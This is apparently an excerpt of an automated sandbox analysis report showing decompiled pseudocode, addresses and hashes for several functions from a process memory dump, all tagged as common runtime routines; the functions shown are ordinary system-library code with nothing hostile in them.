			E015D5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E015D52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E016195D0();
							L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E015EEB70(_t54, 0x16c79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E016195D0();
								L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E015EEB70(_t54, 0x16c79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0161F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E015EEB70(_t54, 0x16c79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E016195D0();
							L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x015d5220
0x015d5224
0x01630d13
0x01630d16
0x01630d19
0x015d522a
0x015d522a
0x015d522d
0x015d522d
0x015d5231
0x015d5235
0x015d5239
0x01630d5c
0x01630d62
0x00000000
0x00000000
0x01630d6a
0x01630d7b
0x01630d7f
0x01630d81
0x01630d84
0x01630d95
0x01630d95
0x01630d6c
0x01630d71
0x01630d71
0x01630d9a
0x00000000
0x015d524a
0x015d524a
0x015d5250
0x01630d24
0x01630d35
0x01630d39
0x01630d3b
0x01630d3e
0x01630d50
0x01630d50
0x01630d26
0x01630d2b
0x01630d2b
0x00000000
0x01630d55
0x015d5256
0x015d525b
0x015d5265
0x01630da7
0x015d526b
0x015d526e
0x015d5272
0x01630db1
0x01630db4
0x01630dc5
0x01630dc5
0x015d5272
0x015d5278
0x015d527e
0x015d528a
0x015d528c
0x015d528d
0x00000000
0x015d5280
0x015d5282
0x015d5288
0x015d529f
0x015d5292
0x00000000
0x015d5292
0x00000000
0x015d5288
0x015d527e

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fd56a0acd1f0a4dc0a24cc03fbf300cc5ccf15ed1a5e9a9a027c8e42447b528
Instruction ID: 6ef830272110e46db85cb26dc5a586faa2634b486f54914631a40ba0ecdc387d
Opcode Fuzzy Hash: 6fd56a0acd1f0a4dc0a24cc03fbf300cc5ccf15ed1a5e9a9a027c8e42447b528
Instruction Fuzzy Hash: 4F31F432661602EBC7369B2CCC85B6A77F5FF90760F114A1DF5160F6A4EB60E808CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01613D43, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01613D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E015E7B60(0, _t61, 0x15b11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E015E7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L015F4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x01613d4c
0x01613d50
0x01613d55
0x01613d5e
0x0164e79a
0x00000000
0x0164e79a
0x01613d68
0x0164e789
0x01613d9d
0x01613da3
0x01613daf
0x01613db5
0x01613dbc
0x01613dc4
0x01613dc9
0x01613dce
0x0164e7ae
0x0164e7ae
0x01613dde
0x01613de2
0x01613de7
0x01613e0d
0x01613e13
0x01613e16
0x01613e1e
0x01613e25
0x01613e28
0x00000000
0x00000000
0x01613e2a
0x01613e2f
0x01613e37
0x01613e37
0x00000000
0x01613e37
0x01613e31
0x00000000
0x01613e31
0x01613e20
0x01613e20
0x01613e35
0x00000000
0x01613de9
0x01613de9
0x01613de9
0x01613dee
0x01613dfd
0x01613dff
0x01613e02
0x01613e05
0x01613e05
0x00000000
0x01613df0
0x01613de7
0x0164e78f
0x0164e794
0x01613d79
0x01613d84
0x01613d89
0x01613d8e
0x00000000
0x0164e7a4
0x01613d96
0x01613d9a
0x00000000
0x01613d9a
0x00000000
0x0164e794
0x01613d6e
0x01613d73
0x00000000
0x0164e7b5
0x00000000

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe9b3a3139693af511535a6cfb551e6216925ffbfd7883ee7820c8db4c5f05b6
Instruction ID: 3c5fd6fc70bd20269cf96b5df913cef1743bef78e097156f8917b49060906aba
Opcode Fuzzy Hash: fe9b3a3139693af511535a6cfb551e6216925ffbfd7883ee7820c8db4c5f05b6
Instruction Fuzzy Hash: C5318D32A05615DBDB29CF2EDC41A7ABBE5FF85720B09806AE946CB364E734D841C790

Uniqueness

Uniqueness Score: -1.00%

Function 0160A61C, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0160A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x16b0220);
				E0162D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x16c7b9c; // 0x0
				_t55 = L015F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0162D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x16c7b10 =  *0x16c7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x16c536c; // 0x77f05368
					if( *_t51 != 0x16c5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x16c5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x16c536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0160A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x0160a61c
0x0160a61e
0x0160a623
0x0160a628
0x0160a62b
0x0160a62d
0x0160a648
0x0160a64a
0x0160a64f
0x01649b44
0x0160a6ec
0x0160a6f1
0x0160a6f1
0x0160a655
0x0160a657
0x0160a65a
0x0160a65d
0x0160a662
0x0160a663
0x0160a667
0x0160a668
0x0160a66d
0x0160a706
0x0160a706
0x01649bda
0x01649be6
0x01649beb
0x00000000
0x01649beb
0x0160a679
0x01649b7a
0x00000000
0x01649b7a
0x0160a683
0x0160a6f4
0x0160a6f7
0x0160a6f9
0x0160a6fd
0x0160a6a0
0x0160a6a0
0x0160a6ad
0x0160a6af
0x0160a6b4
0x01649ba7
0x01649bac
0x00000000
0x00000000
0x01649bc6
0x01649bce
0x01649bd1
0x01649bd3
0x01649bd3
0x00000000
0x01649bd1
0x0160a6bd
0x0160a6c3
0x0160a6c6
0x0160a6d2
0x0160a701
0x0160a704
0x00000000
0x0160a704
0x0160a6d4
0x0160a6d6
0x0160a6d9
0x0160a6db
0x0160a6e1
0x0160a6e6
0x0160a6e8
0x0160a6e8
0x0160a6ea
0x00000000
0x0160a6ea
0x0160a688
0x0160a692
0x0160a694
0x0160a699
0x00000000
0x00000000
0x0160a69d
0x00000000

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afa455c8abce4dc7fcee785c63debcd517c1393c203e0a72a63b91487ea01765
Instruction ID: 5f014b5f7a91c28d102e2879337ae2d12cb07c7619d1271213204fd698cfd6f9
Opcode Fuzzy Hash: afa455c8abce4dc7fcee785c63debcd517c1393c203e0a72a63b91487ea01765
Instruction Fuzzy Hash: C4416875A50315DFCB19CF98CC80BAABBF2BB99344F1481A9E905AB384D775A901CF90

Uniqueness

Uniqueness Score: -1.00%

Function 015FC182, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E015FC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E015F7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E016A8D34(_v8, _t80);
					}
					E015F2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E015EFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E016A8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E015EFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0161B180();
						if(_a4 != 0) {
							E015F2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E015FBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E015FBB2D(_t16, _t15);
						E015FB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E015EFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E015EFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E015EFFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x015fc18d
0x015fc18f
0x015fc191
0x015fc19b
0x015fc1a0
0x015fc1d4
0x015fc1de
0x01642d6e
0x015fc1e4
0x015fc1e4
0x015fc1e4
0x015fc1ec
0x01642d7d
0x01642d7d
0x015fc1f3
0x015fc1ff
0x01642d88
0x01642d8d
0x01642d94
0x01642d94
0x01642d9f
0x01642da4
0x01642dab
0x01642db0
0x01642db2
0x01642db3
0x01642db4
0x01642dbc
0x01642dc3
0x01642dc3
0x015fc205
0x015fc205
0x015fc208
0x015fc20e
0x015fc211
0x015fc216
0x015fc219
0x015fc21f
0x015fc222
0x015fc22c
0x015fc234
0x015fc23a
0x015fc23f
0x015fc245
0x015fc24b
0x015fc251
0x015fc25a
0x015fc276
0x015fc27d
0x015fc27d
0x015fc25c
0x015fc25c
0x00000000
0x015fc25e
0x015fc1a4
0x015fc1aa
0x015fc1b3
0x015fc265
0x015fc26c
0x015fc26c
0x00000000

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: c6fb847d65d4fb19db6e9fe5cfb0de33451a1c2597e399dd2bf44e7c1969565a
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: 25312672A0154BAFD705EBB4C880FE9FB95BF92204F14416ED62C4F201DB346A15CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 01657016, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E01657016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x16cd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E01656B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E01656B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E015F7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E01619AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0161B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L015F4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x01657016
0x0165701e
0x0165702b
0x01657033
0x01657037
0x0165703c
0x0165703e
0x01657041
0x01657045
0x0165704a
0x01657050
0x01657055
0x0165705a
0x01657062
0x01657062
0x0165705a
0x01657064
0x01657064
0x01657067
0x01657071
0x01657096
0x0165709b
0x016570a2
0x016570a6
0x016570a7
0x016570ad
0x016570b3
0x016570b6
0x016570bb
0x016570c3
0x016570c3
0x016570c6
0x016570cd
0x016570dd
0x016570e0
0x016570e2
0x016570e2
0x016570ee
0x01657101
0x016570f0
0x016570f9
0x016570f9
0x0165710a
0x0165710e
0x01657112
0x01657117
0x01657118
0x01657118
0x016570bb
0x0165711d
0x01657123
0x01657131
0x01657131
0x01657136
0x0165713d
0x0165713e
0x0165713f
0x0165714a
0x0165714a
0x01657084
0x01657088
0x00000000
0x0165708e
0x0165708e
0x01657092
0x00000000
0x01657092

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af03cff86d528a9bf9427627e3a8c0a1772eee4f01c7ae445580c32891572808
Instruction ID: 4c469fbcf45538e9b0ad7fb2fc33e84edab36785079de60e3e99254377bd0d9c
Opcode Fuzzy Hash: af03cff86d528a9bf9427627e3a8c0a1772eee4f01c7ae445580c32891572808
Instruction Fuzzy Hash: 873190726047529BC320DF68CD40A6AB7EABFD8700F444A2DFD958B790E730E914C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 01683D40, Relevance: .1, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E01683D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x16cd360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E015F2280(_t34, 0x16c8a6c);
				_t64 =  *0x16c5768; // 0x77f05768
				if(_t64 != 0x16c5768) {
					while(1) {
						_t8 = _t64 + 8; // 0x77f05770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E015EFFB0(_t53, _t64, 0x16c8a6c);
						 *0x16cb1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E015F2280(_t45, 0x16c8a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x16c5768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E015EFFB0(_t51, _t64, 0x16c8a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E0161B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

0x01683d40
0x01683d48
0x01683d52
0x01683d59
0x01683d5d
0x01683d61
0x01683d63
0x01683d67
0x01683d69
0x01683d72
0x01683d76
0x01683d7a
0x01683d7f
0x01683d8b
0x01683d91
0x01683d91
0x01683d91
0x01683d94
0x01683d96
0x01683d9d
0x01683da1
0x01683db0
0x01683dba
0x01683dbc
0x01683dbc
0x01683dc6
0x01683dcb
0x01683dcf
0x01683dd1
0x01683dd4
0x00000000
0x00000000
0x01683dd9
0x01683e0c
0x01683e0c
0x01683e0f
0x01683ddb
0x01683ddb
0x01683de0
0x00000000
0x01683de2
0x01683de2
0x01683de4
0x01683de8
0x01683deb
0x01683df1
0x00000000
0x01683df3
0x01683df3
0x01683df5
0x01683df8
0x01683dfa
0x00000000
0x01683dfa
0x01683df1
0x01683de0
0x01683e11
0x01683e11
0x00000000
0x01683dfe
0x01683e04
0x01683e06
0x00000000
0x01683e06
0x00000000
0x01683e04
0x01683d91
0x01683e15
0x01683e1a
0x01683e1f
0x01683e1f
0x01683e23
0x01683e29
0x00000000
0x00000000
0x01683e2e
0x00000000
0x01683e30
0x01683e30
0x01683e35
0x00000000
0x01683e37
0x01683e3e
0x01683e42
0x01683e48
0x01683e4e
0x00000000
0x01683e4e
0x01683e35
0x00000000
0x01683e2e
0x01683e5b
0x01683e5c
0x01683e5d
0x01683e68
0x00000000

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 588c82b4c1790e58c2d7b4fc3fa37078176d42caaccebcbc74fcfcec6c6ae3da
Instruction ID: 312bfed0d7eeedd5448c4b6ef11a8916dc13025ba3ea0001133537cd636e8d59
Opcode Fuzzy Hash: 588c82b4c1790e58c2d7b4fc3fa37078176d42caaccebcbc74fcfcec6c6ae3da
Instruction Fuzzy Hash: DD318C71605302DFC724EF58CD8446ABBE5FF85A00F054A6EE8999B381D730E905CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 0160A70E, Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0160A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x16c7b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x16c7b10 = 8;
					 *0x16c7b14 = 0x16c7b0c;
					 *0x16c7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E0160A990(0x16c7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0160A840(__edx, __ecx, __ecx, _t52, 0x16c7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x16c7b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x16c7b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x16c7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L015F4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x16c7b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E0161F3E0(_t50,  *0x16c7b14, _t8 >> 3);
						_t28 =  *0x16c7b14; // 0x0
						__eflags = _t28 - 0x16c7b0c;
						if(_t28 != 0x16c7b0c) {
							L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x16c7b14 = _t50;
						_t48 = _v12;
						 *0x16c7b10 = _t9;
						goto L6;
					}
					 *0x16c7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x0160a713
0x0160a714
0x0160a717
0x0160a71d
0x0160a720
0x0160a722
0x0160a727
0x0160a74a
0x0160a754
0x0160a75e
0x0160a768
0x0160a76a
0x0160a773
0x0160a78b
0x0160a790
0x0160a792
0x0160a741
0x0160a741
0x0160a743
0x0160a749
0x0160a749
0x0160a732
0x0160a73a
0x0160a797
0x0160a79d
0x0160a7a3
0x0160a7a9
0x0160a7b6
0x0160a7bc
